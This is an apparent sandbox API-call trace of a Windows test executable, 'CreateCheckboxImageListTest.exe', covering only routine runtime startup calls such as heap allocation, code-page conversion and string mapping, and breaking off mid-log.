# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Jan 15 2020 08:26:44 # Log Creation Date: 31.01.2020 02:17:22.133 Process: id = "1" image_name = "createcheckboximagelisttest.exe" filename = "c:\\users\\fd1hvy\\desktop\\createcheckboximagelisttest.exe" page_root = "0x117f0000" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x740" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x13e4 [0041.808] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0041.808] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2040000 [0041.827] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.827] GetProcAddress (hModule=0x74030000, lpProcName="FlsAlloc") returned 0x74044ae0 [0041.827] GetProcAddress (hModule=0x74030000, lpProcName="FlsGetValue") returned 0x74044b20 [0041.827] GetProcAddress (hModule=0x74030000, lpProcName="FlsSetValue") returned 0x74044b40 [0041.827] GetProcAddress (hModule=0x74030000, lpProcName="FlsFree") returned 0x74044b00 [0041.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.828] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.828] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.828] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.828] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.829] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.829] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.829] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.829] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.829] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.829] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.830] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0041.830] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x214) returned 0x20405a8 [0041.830] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.830] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0041.830] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0041.830] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0041.830] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0041.830] GetCurrentThreadId () returned 0x13e4 [0041.830] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0041.830] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x800) returned 0x20407c8 [0041.830] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0041.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0041.831] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0041.831] SetHandleCount (uNumber=0x20) returned 0x20 [0041.831] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe\" " [0041.831] GetEnvironmentStringsW () returned 0x53ea80* [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0xaca) returned 0x2040fd0 [0041.831] FreeEnvironmentStringsW (penv=0x53ea80) returned 1 [0041.831] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x43ce40, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\createcheckboximagelisttest.exe")) returned 0x37 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x78) returned 0x2041aa8 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x94) returned 0x2041b28 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x3e) returned 0x2041bc8 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x50) returned 0x2041c10 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x6e) returned 0x2041c68 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x78) returned 0x2041ce0 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x62) returned 0x2041d60 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x28) returned 0x2041dd0 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x48) returned 0x2041e00 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x1a) returned 0x2041e50 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x2e) returned 0x2041e78 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x56) returned 0x2041eb0 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x2a) returned 0x2041f10 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x2e) returned 0x2041f48 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x44) returned 0x2041f80 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x1c) returned 0x2041fd0 [0041.831] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x182) returned 0x2041ff8 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x7c) returned 0x2042188 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x36) returned 0x2042210 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x3a) returned 0x2042250 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x90) returned 0x2042298 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x24) returned 0x2042330 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x30) returned 0x2042360 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x36) returned 0x2042398 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x48) returned 0x20423d8 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x52) returned 0x2042428 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x3c) returned 0x2042488 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0xd6) returned 0x20424d0 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x2e) returned 0x20425b0 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x1e) returned 0x20425e8 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x2c) returned 0x2042610 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x50) returned 0x2042648 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x4e) returned 0x20426a0 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x24) returned 0x20426f8 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x42) returned 0x2042728 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x20) returned 0x2042778 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x38) returned 0x20427a0 [0041.832] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x24) returned 0x20427e0 [0041.832] HeapFree (in: hHeap=0x2040000, dwFlags=0x0, lpMem=0x2040fd0 | out: hHeap=0x2040000) returned 1 [0041.832] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74030000 [0041.832] GetProcAddress (hModule=0x74030000, lpProcName="IsProcessorFeaturePresent") returned 0x74045960 [0041.832] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0041.833] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x80) returned 0x2042810 [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] GetACP () returned 0x4e4 [0041.834] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x220) returned 0x2042898 [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] IsValidCodePage (CodePage=0x4e4) returned 1 [0041.834] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0041.834] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0041.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0041.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0041.834] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0041.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0041.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0041.834] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0041.834] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0041.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿܤCÑ\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0041.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0041.835] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0041.835] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0041.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿܤCÑ\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0041.835] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x800) returned 0x2040fd0 [0041.835] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x415b5f) returned 0x0 [0041.835] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.836] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.836] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.837] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.837] GlobalLock (hMem=0x1f90004) returned 0x531198 [0041.837] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x5322b0 [0041.837] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x53f670 [0041.837] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x536e50 [0041.838] 